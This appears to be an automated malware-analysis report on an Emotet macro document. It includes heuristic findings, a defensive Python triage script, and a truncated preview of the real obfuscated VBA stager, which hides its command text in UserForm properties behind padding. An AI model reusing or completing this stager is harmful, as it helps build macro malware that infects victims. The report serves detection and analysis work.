Verdict: MALICIOUS (risk score 262)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-exec handler and a command stager that rebuilds its command text from hidden UserForm properties before handing it to CreateObject. ClamAV identifies the file as Doc.Downloader.Emotet-7465579-0, strongly suggesting the Emotet family. The VBA is heavily padded with dead-store arithmetic between the few live statements (see the preview below), and the obfuscated code most likely acts as a downloader for a second-stage payload, a standard Emotet maldoc tactic.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-7465579-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-7465579-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code.
- VBA UserForm hidden-property command stager [critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER]: A VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive: it relies on the user enabling macros, not on a parser bug.
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro, which Word runs automatically when the document is opened with macros enabled.
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call (late-bound COM instantiation; because the ProgID comes from a decoded variable rather than a string literal, the object being created is not visible to static scanners).
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML namespace URI present in ordinary Office files and is not an indicator on its own.
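The three VBA findings above describe a single pattern: an auto-exec entry point, a CreateObject() whose ProgID is a variable rather than a literal, and command text reassembled from form properties with Split/Join, all buried in padding. The Python below is an added example, not the analyzer's code: it applies the same heuristics to decoded VBA text (as produced by olevba) and additionally strips the dead-store padding visible in the preview, i.e. `Sin`/`Atn`/`CStr` assignments to names that are never read anywhere else. The heuristic labels reuse the report's IDs; SAMPLE_VBA and BENIGN_VBA are constructed inputs, and `ThisDocument.txtSeed` and `frmStage` are hypothetical control names, not identifiers from the real macros.bas.

```python
"""Heuristic triage of decoded VBA source for the stager shape flagged above.
Added example, not the analyzer's code; SAMPLE_VBA and BENIGN_VBA are
constructed for illustration and are not the real macros.bas."""
import re
from dataclasses import dataclass, field

# Entry points Office runs as soon as macros are enabled.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\s*\(", re.I | re.M)
CREATEOBJ_RE = re.compile(r"\bCreateObject\s*\(\s*([^)]*?)\s*\)", re.I)
# Form/control properties the report names as covert string storage.
HIDDEN_PROP_RE = re.compile(r"\.(ControlTipText|Tag|Pages|HelpContextId)\b", re.I)
SPLIT_JOIN_RE = re.compile(r"\b(Split|Join)\s*\(", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.*)$", re.I)
STRING_LIT_RE = re.compile(r'^"[^"]*"$')
IDENT_RE = re.compile(r"[A-Za-z_]\w*")


@dataclass
class Triage:
    heuristics: list = field(default_factory=list)   # report-style labels
    autoexec: list = field(default_factory=list)     # matched entry points
    createobject_args: list = field(default_factory=list)
    hidden_props: list = field(default_factory=list)
    dead_stores: int = 0                             # write-only assignments
    skeleton: list = field(default_factory=list)     # source minus padding


def triage(vba_src: str) -> Triage:
    t = Triage()
    lines = vba_src.splitlines()
    code = "\n".join(lines)
    t.autoexec = [m.group(1) for m in AUTOEXEC_RE.finditer(code)]
    if any(n.lower() == "document_open" for n in t.autoexec):
        t.heuristics.append("OLE_VBA_DOCOPEN")
    t.createobject_args = [m.group(1) for m in CREATEOBJ_RE.finditer(code)]
    if t.createobject_args:
        t.heuristics.append("OLE_VBA_CREATEOBJ")
    # A ProgID that is not a string literal was decoded at run time, so a
    # static scanner cannot see which COM object will be created.
    from_variable = any(not STRING_LIT_RE.match(a) for a in t.createobject_args)
    t.hidden_props = sorted({m.group(1) for m in HIDDEN_PROP_RE.finditer(code)},
                            key=str.lower)
    if t.autoexec and from_variable and t.hidden_props and SPLIT_JOIN_RE.search(code):
        t.heuristics.append("OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER")
    # Dead-store filter (VBA names are case-insensitive): an assignment whose
    # target occurs nowhere else can never be read, so it is padding; what
    # survives is the live data flow.
    counts = {}
    for ident in IDENT_RE.findall(code):
        counts[ident.lower()] = counts.get(ident.lower(), 0) + 1
    for line in lines:
        m = ASSIGN_RE.match(line)
        if m and counts[m.group(1).lower()] == 1:
            t.dead_stores += 1
        elif line.strip():
            t.skeleton.append(line.strip())
    return t


# Constructed to mimic the padding style of the extracted preview; the names
# and the txtSeed/frmStage controls are hypothetical.
SAMPLE_VBA = '''\
Private Sub Document_open()
    Select Case Wlvrqzmd
    Case Hxnkpzte
        Pdxqvmrw = Sin(Zkqlhvne)
        Rtgbwysm = CStr(Bnqxkdsu)
        Jrmkzpof = 324
    End Select
    Qmzhxvbt
End Sub
Function Qmzhxvbt()
    Lkzdvnqw = Fvmrjxph * Atn(Ykqtmlsr) * (Gxwnrdsp + Tjzkbvhe)
    Cvhtqpxn = ThisDocument.txtSeed
    Nbwzqyfk = Cvhtqpxn + frmStage.Tag + frmStage.ControlTipText
    Dgpszxtv = Join(Split(Nbwzqyfk, "!"), "")
    Set Ovqrkmyw = CreateObject(Dgpszxtv)
    Ovqrkmyw.Run frmStage.HelpContextId
End Function
'''

# A literal ProgID with no auto-exec handler must not trip the stager rule.
BENIGN_VBA = '''\
Sub ExportCsv()
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.CreateTextFile("out.csv").WriteLine "a,b"
End Sub
'''
```

Run `triage(open("macros.bas").read())` on a real olevba dump and print `skeleton`: on the sample above it drops the four write-only assignments and leaves the concatenation, the Join/Split call and the CreateObject, which is the part an analyst actually needs to read. The stager label only fires when all four conditions coincide, so a routine `CreateObject("Scripting.FileSystemObject")` in a user macro stays at OLE_VBA_CREATEOBJ. The filter is deliberately simple: it treats each module dump as one namespace and does not strip comments or string contents before counting identifiers.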
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10690 bytes | 304aa0c084bb33e315603e18d924579f66af8ac51d66f8ded3c4f581e087bc4a |
Preview: first 1,000 lines of the extracted script (macros.bas). The dump concatenates every module's decompressed source, so each repeated `Attribute VB_Name` header below marks a module boundary. Note the `VB_Control` attribute on the ThisDocument module, which declares an MSForms TextBox named Tgkrnayc: the function Figmhqxs reads it as `Oqcpczya.Tgkrnayc` and concatenates it with three properties of the Gqgebiwuy form module, while the surrounding Sin/Atn/CStr assignments and empty loops are padding whose results are never read.
Attribute VB_Name = "Oqcpczya"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Tgkrnayc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Mroxvsnsni
Case Dndoetjf
Cpljnkokojqg = Sin(Dnlzzswmxicnx)
Loforoyllf = CStr(Dtrnwwfl)
Kgdypschz = 324
Xcvkrzje = Sin(Tvptsfvfrscvd)
Ktzgiefpcgrwc = CStr(Vgoiqkofwnhbi)
Bzrmhgkyuvofn = 567
Isbuwvhu = Sin(Wocsacxveer)
Xqkiuncebsv = CStr(Aoycufeyksi)
Srkjikdcdemn = 5645
End Select
For Kjvwhnmcj = Kmbrnycc To Lurkkblwjloh
While Ppwbsgpinhxx <> Qfjllmzpdm
Agzlncnhcx = Jufdgkmn * Atn(Feccvmta) * (Fggjicuuju + Dicqhwitzjmz)
Wend
Next
Select Case Gohbcutmpb
Case Yusfzmlnvm
Ouwwvwflivh = Sin(Izcyxegjx)
Nehrjlqtltni = CStr(Rtwfddmmxqnip)
Xdrkdiqon = 324
Enunvqfagljeu = Sin(Ahqeavslo)
Ytpbeidgyzsjv = CStr(Prxnzxew)
Xjbblcgxzr = 567
Egbanhiixv = Sin(Gbobqyuxhshyc)
Wmlwesemrl = CStr(Wozlccevkn)
Axndmycyi = 5645
End Select
For Vlzcecoxpq = Jihfwxjbjhevh To Asjbbbcd
While Zztwqpql <> Vftfaytc
Dvabnegpo = Ehcxyqfss * Atn(Hafvzdacha) * (Zezrilibwcxq + Ibhojwusnzw)
Wend
Next
Select Case Maogpdidnvhzx
Case Ceouocembji
Jteecsewaqd = Sin(Wqktdcjbkjby)
Innwgcsutqdx = CStr(Uboldvgnchg)
Ozkdflxwintw = 324
Cxuqgxuh = Sin(Qvvoulfqaldu)
Xlhslouopu = CStr(Hrzjwhqpnkp)
Widwcxhn = 567
Uqcvubbfbkee = Sin(Roweuzmwxqp)
Snxwcayfsul = CStr(Lfozxsumena)
Hgxsmgokjrdo = 5645
End Select
For Okyukifn = Yswlenawt To Shzhfhdcnkkv
While Bgspuntyq <> Jdfvrhutkwdy
Abluwnwif = Hgzuytrfn * Atn(Yhwdqcdjy) * (Ktliethyb + Ojavymdl)
Wend
Next
Ssfvvbokicf
End Sub
Attribute VB_Name = "Gqgebiwuy"
Attribute VB_Base = "0{0562E1D4-053B-47CF-9BCB-FBCBA1790242}{AEF8FBD6-8092-4120-A55C-2F111E107B74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Znimzghmnitmj"
Function Figmhqxs()
Select Case Yfucfzfmvr
Case Xpjzsvkioklj
Kiqkfphyoj = Sin(Fqwdqyrqwe)
Snnexouk = CStr(Pxwlmjlzaakj)
Mltmsoqfjpsr = 324
Baodlmbz = Sin(Mheweyqix)
Luisicknhtug = CStr(Algydsmeozkkt)
Yjuijpfgld = 567
Mymsbvydmkk = Sin(Ghgiiyjj)
Jzxzjuevut = CStr(Fbhjouwy)
Aidhzydfahkpc = 5645
End Select
For Vojiopay = Ebyjomdv To Pwbvgspttqqzo
While Gnqzjajxgvwe <> Vhtrtnznnb
Hepkemsq = Mvbzfyvajnthy * Atn(Hvstsapcisehv) * (Medxuxquha + Rigaggoxrzx)
Wend
Next
Oqnodyhufx = Oqcpczya.Tgkrnayc
Select Case Rjrmcybynxfhz
Case Zlktkfezwncj
Ctmgslgbe = Sin(Fsouolobpjx)
Zqnjvzapeskd = CStr(Gsmyhfde)
Eibniiwfytg = 324
Xffeabzdrvkij = Sin(Qqqudyenxn)
Wffzufupsbbcd = CStr(Nmrfzflohc)
Zssirtedymvpd = 567
Soonqpmrafi = Sin(Kqxwjgvwztk)
Knarcblssatou = CStr(Bscjmnshpyf)
Qsvefreyqidg = 5645
End Select
For Sqdhoxivhqbwl = Lswfsbzeo To Fokjzcpo
While Lrrzkvledjg <> Fqgaexsmpyls
Xrygwsqzbf = Foalawtwe * Atn(Clrhewsfgqln) * (Cjscfoauw + Mdxoyxge)
Wend
Next
Xvulchkxkucla = Oqnodyhufx + Gqgebiwuy.Laoxdtqxzy + Gqgebiwuy.Cicpadkjmsazz + Gqgebiwuy.Rkkcffuyok
Select Case Rmibztuvpkrxj
Case Zyzxqstdjimc
Seykbocyei = Sin(Sshfrhncrkt)
Gxjzsmqtm = CStr(Tmhvsaurx)
Avdrepxrhkrfv = 324
Zlvjxgubmear = Sin(Qcjfgxnwbhb)
Qubhmfzbivnc = CStr(Urmexmaqi)
Ptfdjoibldgkx = 567
Lohhvdmqse = Sin(Djuamthw)
Yzgfbhdngoql = CStr(Iamwccmyul)
Rdurprasqiaq = 5645
End Select
For Nfyamshis = Luigaevbj To Toyykjvz
While Uxphztylkjkij <> Rlqdeosonmkbn
Msllrxtzalwpy = Keucsxfvvhb * Atn(Uprkdmws) * (Nyympshyuhxbf + Pahwpeqpqe)
Wend
Next
Tpxqbodccsq = Xvulchkxkucla
... (truncated)